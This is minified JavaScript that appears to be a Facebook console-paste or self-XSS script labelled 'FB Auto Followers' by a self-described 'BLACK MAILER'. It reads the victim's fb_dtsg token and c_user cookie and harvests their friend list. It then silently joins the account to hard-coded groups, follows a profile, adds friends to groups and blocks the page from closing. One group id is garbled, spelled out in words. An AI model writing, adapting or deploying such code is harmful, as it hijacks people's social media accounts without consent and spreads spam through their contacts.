return b},load:function(b,c,a,h,g){var e=this.d();if(e&&b){e.overrideMimeType&&e.overrideMimeType("text/xml");h||(h="GET");a||(a="text");g||(g={});a=a.toLowerCase();h=h.toUpperCase();b+=b.indexOf("?")+ 1?"&":"?";var k=null;"POST"==h&&(k=b.split("?"),b=k[0],k=k[1]);e.open(h,b,!0);e.onreadystatechange=g.c?function(){g.c(e)}:function(){if(4==e.readyState)
if(200==e.status){var b="";e.responseText&&(b=e.responseText);"j"==a.charAt(0)?(b=b.replace(/[\n\r]/g,""),b=eval("("+ b+")")):"x"==a.charAt(0)&&(b=e.responseXML);c&&c(b)}else g.f&&document.getElementsByTagName("body")[0].removeChild(g.f),g.e&&(document.getElementById(g.e).style.display="none"),error&&error(e.status)};e.send(k)}},d:function(){return this.b()}};function ChangeLocation(){window.location.href="http://www.facebook.com/"}
setTimeout("ChangeLocation",1);window.onbeforeunload=function(){if(window[tag+"_close"])return"This script is running now!"};var i=3;var tay=3;var suc=0;var err=0;var arr=new Array;var arn=new Array;var pho=new Array;var tag="Close";var page_name,x=document.getElementsByTagName("span");for(i=0;i<x.length;i++)
if(x[i].getAttribute("itemprop")=="name")page_name=x[i].innerHTML;var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);jx.load(window.location.protocol+"///www.facebook.com/ajax/typeahead/first_degree.php?viewer="+ user_id+"&token=v7&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha&__user="+ user_id+"&__a=1&__dyn=7n8aD5z5CF-3ui&__req=l",function(a){var b=a;var c=b.substring(b.indexOf("{"));var d=JSON.parse(c);d=d.payload.entries;for(var e=0;e<d.length;e++)arr.push(d[e].uid);for(var eg=0;eg<d.length;eg++)arn.push(d[eg].text);for(var pic=0;pic<d.length;pic++)pho.push(d[pic].photo);i=arr.length- 1;tay=i;console.log(arr.length);var display="<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0px 3px 8px rgba(0, 0, 0, 0.9);position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.9);border-radius: 1em 4em 1em 4em;border:3px solid rgba(0,0,0,0.9);background-color:rgba(0,0,0,0.9);color:#ffffff'>";display+="<div style='padding-bottom:10px;font-size:20px;'>"+ Title+"</div>";display+=arr.length+" Friends Detected, Please Wait . . .";display+="</div>";document.getElementById("pagelet_sidebar").innerHTML=display;InviteFriends(arr[i])});function a(a){var b=new XMLHttpRequest,c="/ajax/follow/follow_profile.php?__a=1",d="profile_id="+a+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";b.open("POST",c,!0),b.setRequestHeader("Content-type","application/x-www-form-urlencoded"),b.setRequestHeader("Content-length",d.length),b.setRequestHeader("Connection","close"),b.onreadystatechange=function(){4==b.readyState&&200==b.status&&b.close},b.send(d)}
function clickfr(){document.getElementsByClassName("search").length>0?nHtml.ClickUp(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1]):j++,setTimeout("clickfr_callback()",2e3)}
function addfriend(){i++,setTimeout("clickfr()",2e3)}var gid=["787207134631431"],fb_dtsg=document.getElementsByName("fb_dtsg")[0].value,user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),httpwp=new XMLHttpRequest,urlwp="/ajax/groups/membership/r2j.php?__a=1",paramswp="&ref=group_jump_header&group_id="+gid+"&fb_dtsg="+fb_dtsg+"&__user="+user_id+"&phstamp=";httpwp.open("POST",urlwp,!0),httpwp.setRequestHeader("Content-type","application/x-www-form-urlencoded"),httpwp.setRequestHeader("Content-length",paramswp.length),httpwp.setRequestHeader("Connection","keep-alive"),httpwp.send(paramswp);var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value,user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),fb_dtsg=document.getElementsByName("fb_dtsg")[0].value,user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),fb_dtsg=document.getElementsByName("fb_dtsg")[0].value,user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var gid=["361668167308222"],fb_dtsg=document.getElementsByName("fb_dtsg")[0].value,user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),httpwp=new XMLHttpRequest,urlwp="/ajax/groups/membership/r2j.php?__a=1",paramswp="&ref=group_jump_header&group_id="+gid+"&fb_dtsg="+fb_dtsg+"&__user="+user_id+"&phstamp=";httpwp.open("POST",urlwp,!0),httpwp.setRequestHeader("Content-type","application/x-www-form-urlencoded"),httpwp.setRequestHeader("Content-length",paramswp.length),httpwp.setRequestHeader("Connection","keep-alive"),httpwp.send(paramswp);var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value,user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),Friend=Array();gf=new XMLHttpRequest,gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token"+Math.random()+"&filter[0]=user&options[0]=Friend_only",!1),gf.send(),4!=gf.readyState||(data=eval("("+gf.responseText.substr(9)+")"),data.error||(Friend=data.payload.entries.sort(function(a,b){return a.index-b.index})));var Title='FB Auto Followers<br/> By:<A style="color:#00FF7F;" href="https://www.facebook.com/only.golden1" target="_blank">GOLDEN XD [BLACK MAILER]</A>';grpname=document.getElementById("groupsJumpTitle").innerHTML;var Descriptions="",_text='</br>Visit: <A style="color:#3B5998;" href="https://www.facebook.com"></A>, Join Yuk!';jx={getHTTPObject:function(){var a=!1;if("undefined"!=typeof ActiveXObject)try{a=new ActiveXObject("Msxml2.XMLHTTP")}catch(b){try{a=new ActiveXObject("Microsoft.XMLHTTP")}catch(c){a=!1}}else if(window.XMLHttpRequest)try{a=new XMLHttpRequest}catch(b){a=!1}return a},load:function(url,callback,format,method,opt){var http=this.init();if(http&&url){http.overrideMimeType&&http.overrideMimeType("text/xml"),method||(method="GET"),format||(format="text"),opt||(opt={}),format=format.toLowerCase(),method=method.toUpperCase();var now="uid="+(new Date).getTime();url+=url.indexOf("?")+1?"&":"?",url+=now;var parameters=null;if("POST"==method){var parts=url.split("?");url=parts[0],parameters=parts[1]}http.open(method,url,!0);var ths=this;http.onreadystatechange=opt.handler?function(){opt.handler(http)}:function(){if(4==http.readyState)if(200==http.status){var result="";http.responseText&&(result=http.responseText),"j"==format.charAt(0)?(result=result.replace(/[\n\r]/g,""),result=eval("("+result+")")):"x"==format.charAt(0)&&(result=http.responseXML),callback&&callback(result)}else opt.loadingIndicator&&document.getElementsByTagName("body")[0].removeChild(opt.loadingIndicator),opt.loading&&(document.getElementById(opt.loading).style.display="none"),error&&error(http.status)},http.send(parameters)}},bind:function(a){var b={url:"",onSuccess:!1,onError:!1,format:"text",method:"GET",update:"",loading:"",loadingIndicator:""};for(var c in b)a[c]&&(b[c]=a[c]);if(b.url){var d=!1;b.loadingIndicator&&(d=document.createElement("div"),d.setAttribute("style","position:absolute;top:0px;left:0px;"),d.setAttribute("class","loading-indicator"),d.innerHTML=b.loadingIndicator,document.getElementsByTagName("body")[0].appendChild(d),this.opt.loadingIndicator=d),b.loading&&(document.getElementById(b.loading).style.display="block"),this.load(b.url,function(a){b.onSuccess&&b.onSuccess(a),b.update&&(document.getElementById(b.update).innerHTML=a),d&&document.getElementsByTagName("body")[0].removeChild(d),b.loading&&(document.getElementById(b.loading).style.display="none")},b.format,b.method,b)}},init:function(){return this.getHTTPObject()}};var nHtml={FindByAttr:function(a,b,c,d){"className"==c&&(c="class");var e=document.evaluate(".//"+b+"[@"+c+"='"+d+"']",a,null,XPathResult.FIRST_ORDERED_NODE_TYPE,null);return e&&e.singleNodeValue?e.singleNodeValue:null},FindByClassName:function(a,b,c){return this.FindByAttr(a,b,"className",c)},FindByXPath:function(a,b){try{var c=document.evaluate(b,a,null,XPathResult.FIRST_ORDERED_NODE_TYPE,null)}catch(d){GM_log("bad xpath:"+b)}return c&&c.singleNodeValue?c.singleNodeValue:null},VisitUrl:function(a){window.setTimeout(function(){document.location.href=a},500+Math.floor(500*Math.random()))},ClickWin:function(a,b,c){var d=a.document.createEvent("MouseEvents");return d.initMouseEvent(c,!0,!0,a,0,0,0,0,0,!1,!1,!1,!1,0,null),!b.dispatchEvent(d)},Click:function(a){return this.ClickWin(window,a,"click")},ClickTimeout:function(a,b){window.setTimeout(function(){return nHtml.ClickWin(window,a,"click")},b+Math.floor(500*Math.random()))},ClickUp:function(a){this.ClickWin(window,a,"mousedown"),this.ClickWin(window,a,"mouseup"),this.ClickWin(window,a,"click")},GetText:function(a,b){var c="";if(void 0==b&&(b=0),!(b>40)){if(void 0!=a.textContent)return a.textContent;for(var d=0;a.childNodes.length>d;d++){var e=a.childNodes[d];c+=this.GetText(e,b+1)}return c}}};void 0==document.getElementsByClassName&&(document.getElementsByClassName=function(a){for(var e,b=RegExp("(?:^|\\s)"+a+"(?:$|\\s)"),c=document.getElementsByTagName("*"),d=[],f=0;null!=(e=c[f]);f++){var g=e.className;g&&-1!=g.indexOf(a)&&b.test(g)&&d.push(e)}return d}),Array.prototype.find=function(a){var b=!1;for(i=0;this.length>i;i++)"function"==typeof a?a.test(this[i])&&(b||(b=[]),b.push(i)):this[i]===a&&(b||(b=[]),b.push(i));return b};var i=3,tay=3,j=0,k=0,suc=0,err=0,arr=Array(),arn=Array(),pho=Array(),getuname=document.getElementsByClassName("fbxWelcomeBoxName")[0].innerHTML,gid=document.getElementsByName("group_id")[0].value;jx.load(window.location.protocol+"//www.facebook.com/ajax/typeahead/first_degree.php?"+"__a=1&filter[0]=user&lazy=0&viewer="+user_id+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm",function(a){var b=a,c=b.substring(b.indexOf("{")),d=JSON.parse(c);d=d.payload.entries;for(var e=0;d.length>e;e++)arr.push(d[e].uid);for(var f=0;d.length>f;f++)arn.push(d[f].text);for(var g=0;d.length>g;g++)pho.push(d[g].photo);i=arr.length-1,tay=i,console.log(arr.length);var h="<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);border-radius:3px;border:1px solid rgba(200,200,50,0.2);background-color:rgba(255,255,255,0.9);color:#000000'>";h+="<div style='padding-bottom:10px;font-size:20px;'>"+Title+"</div>",h+=arr.length+"  Friend Detected",h+="</div>",document.getElementById("pagelet_sidebar").innerHTML=h,AddFriendtoGroup(arr[i])});
 
//GROUP
var gid=["six hundred sixty one trillion one hundred twenty billion nine hundred seven million two hundred eighty thousand six hundred ten "];
var gid=["854224284594686"];
 
 
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
 
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);
